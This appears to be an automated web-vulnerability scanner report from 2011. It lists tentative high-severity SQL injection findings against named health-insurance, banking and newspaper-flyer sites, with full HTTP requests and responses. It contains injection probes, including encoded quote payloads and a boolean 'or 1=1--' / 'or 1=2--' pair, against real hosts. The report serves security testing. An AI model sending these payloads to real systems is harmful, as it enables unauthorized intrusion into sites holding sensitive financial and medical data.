21.13. http://www.paperg.com/sitemap/arizona-daily-sun/3027.html
21.14. http://www.paperg.com/sitemap/bay-area-parent---east-bay/88.html
21.15. http://www.paperg.com/sitemap/bay-area-parent---san-francisco/186.html
21.16. http://www.paperg.com/sitemap/bay-area-parent---silicon-valley/182.html
21.17. http://www.paperg.com/sitemap/bay-state-banner/59.html
21.18. http://www.paperg.com/sitemap/billings-gazette---billings-gazette/2701.html
21.19. http://www.paperg.com/sitemap/billings-gazette---thrifty-nickel/3878.html
21.20. http://www.paperg.com/sitemap/birmingham-parent-magazine/2431.html
21.21. http://www.paperg.com/sitemap/bismarck-tribune/3240.html
21.22. http://www.paperg.com/sitemap/boston-blogs/116.html
21.23. http://www.placelocal.com/api.php
21.24. http://www.xsnet.com/Portals/64787/footerStuff.html
22. Content type incorrectly stated
22.2. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css
22.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
22.5. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
22.6. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur
22.7. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
22.9. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css
22.10. http://www.frontrowusa.com/favicon.ico
22.11. http://www.paperg.com/jsfb/embed.php
22.12. http://www.placelocal.com/api.php
22.13. http://xsinternational.app6.hubspot.com/salog.js.aspx
23.1. https://cignaforhcp.cigna.com/
23.3. https://secure.regionsmortgage.com/
23.4. https://secureapps.regions.com/
23.5. https://securebank.regions.com/
23.6. https://sso.corp.cigna.com/
23.7. https://www.frontrowusa.com/
23.9. https://www.planservices.com/
23.10. https://www.regions.com/
23.11. https://wwwa.applyonlinenow.com/
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... | 
| HTTP/1.1 500 Internal Server Error content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:43:07 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 89 $wsep: Set-Cookie: PD_STATEFUL_e87abf76-4b84 Content-Length: 89 Error 500: Filter [ServletRequestUserC | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:43:08 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 107 surrogate-control: no-store cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: MYCIGNA_OEP_JSESSIONID Set-Cookie: PD_STATEFUL_e87abf76-4b84 Content-Length: 107 ... <html> <body> Response <hr> Read 821 bytes in 1ms. </body> </html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 <Info PageLoadMilliSecs="52340%2527" Version="2010.12.22.1" TimezoneOffset="300" /> <Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" ...[SNIP]... | 
| HTTP/1.1 500 Internal Server Error content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:35:43 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 89 $wsep: Content-Length: 89 Error 500: Filter [ServletRequestUserC | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 <Info PageLoadMilliSecs="52340%2527%2527" Version="2010.12.22.1" TimezoneOffset="300" /> <Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" ...[SNIP]... | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:35:44 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 107 surrogate-control: no-store cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: MYCIGNA_OEP_JSESSIONID Content-Length: 107 ... <html> <body> Response <hr> Read 831 bytes in 0ms. </body> </html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... Offset="300" /> <Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527" /> <Window WindowHref="https%3A//my ...[SNIP]... | 
| HTTP/1.1 500 Internal Server Error content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:39:06 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 89 $wsep: Content-Length: 89 Error 500: Filter [ServletRequestUserC | 
| POST /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web Origin: https://my.cigna.com X-TeaLeaf-Page-Render: 52340 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: INIT X-TeaLeaf-Page-Url: /web/public/guest X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 821 <ClientEventSet PostTimeStamp="13055 ...[SNIP]... Offset="300" /> <Document Title="myCIGNA - guest" LastModified="05/16/2011 15:31:35" CharacterSet="UTF-8" Height="902" Width="1136" Anchors="4" Embeds="1" Forms="2" Images="9" Links="30" Plugins="1%2527%2527" /> <Window WindowHref="https%3A//my ...[SNIP]... | 
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Mon, 16 May 2011 15:39:07 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-old-content-length: 107 surrogate-control: no-store cache-control: no-cache="set-cookie, set-cookie2" expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: MYCIGNA_OEP_JSESSIONID Content-Length: 107 ... <html> <body> Response <hr> Read 831 bytes in 1ms. </body> </html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | https://secureapps | 
| Path: | /oao/app01.aspx | 
| POST /oao/app01.aspx?type Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 Origin: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c Content-Length: 3109 __EVENTTARGET=&_ ...[SNIP]... ntPlaceHolder1%24txt ...[SNIP]... | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:24:21 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 10137 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms[ if (!theForm) { theForm = document.aspnetForm; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <script type='text/javascript' src='/OAO/DESGetFiles <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="mM/j1zEOfB6kZ </div> <div id="page"> <div id="mgMnuTop"> <div class="mnuTopLink"> <a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:_ </div> </div> <div id="mgLogo"> <img src="https://www.regions </div> <div id="mgBranding"> <div id="mgBrandSmall"> </div> <div id="mgBrandLarge"> <h1 id="ctl00_h1AppTitle">Reg ...[SNIP]... | 
| POST /oao/app01.aspx?type Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 Origin: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c Content-Length: 3109 __EVENTTARGET=&_ ...[SNIP]... ntPlaceHolder1%24txt ...[SNIP]... | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:24:22 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 10148 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms[ if (!theForm) { theForm = document.aspnetForm; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET theForm.__EVENTARGUMENT theForm.submit(); } } //]]> </script> <input type='hidden' id='DES_JSE' name='DES_JSE' value='' /> <script type='text/javascript'> //<![CDATA[ var vJDHF = document.getElementById ? document.getElementById( if (vJDHF){vJDHF.value='1';} //]]> </script> <script type='text/javascript' src='/OAO/DESGetFiles <div> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="vb8s9pKtPLPv5 </div> <div id="page"> <div id="mgMnuTop"> <div class="mnuTopLink"> <a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:_ </div> </div> <div id="mgLogo"> <img src="https://www.regions </div> <div id="mgBranding"> ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/albany-times | 
| GET /flyerboard/albany-times Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:21:41 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 3772 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Flyerboard - NY Daily News" /> <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/albany-times Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:21:42 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 1 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/app.com/1992 | 
| GET /flyerboard/app.com/199289983410%20or%201%3d1-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:23 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3772 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Flyerboard - NY Daily News" /> <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/app.com/199289983410%20or%201%3d2-- Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:23 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/code | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:18:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3963 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "CODE ENFORCEMENT OFFICER" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:18:39 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/code | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:11 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3963 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "CODE ENFORCEMENT OFFICER" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg ...[SNIP]... | 
| GET /flyerboard/code Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:11 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/conifer-park | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:33 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 3877 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Flyerboard - Conifer Park - NY Daily News</title> <meta http-equiv="imagetoolbar" content="false"> <meta name="MSSmartTagsPre <meta name="title" content = "Conifer Park" /> <meta name="description" content = "" /> <link rel="image_src" href="http://www.paperg <!--[if IE]> <link rel="stylesheet" type="text/css" href="/inc/ie.css"> <![endif]--> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="/inc/style_no <![endif]--> <style type="text/css"> label { width: 70px; margin-right: 5px; text-align: 5px; } form { text-align: center; } form#filters label { display: block; padding-top: 10px; } form#filters { float: right; width: 190px; padding-top: 5px; display: block; text-align: left; } </style> <link rel="stylesheet" type="text/css" href="https://www.paperg <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <link rel="stylesheet" type="text/css" href="http://www.paperg </head> <body class="smaller"> <!-- START : BACKGROUND BAR --> <div id="background_bar <div id="background_bar">  </div> <!-- END : BACKGROUND BAR --> <div id="body-wrap"> <!-- START: HEADER --> <div id="header"> <a href="https://www.paperg </div> ...[SNIP]... | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:20:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 1 Connection: close Via: 1.1 AN-0016020122637050 | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/conifer-park | 
| GET /flyerboard/conifer-park Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
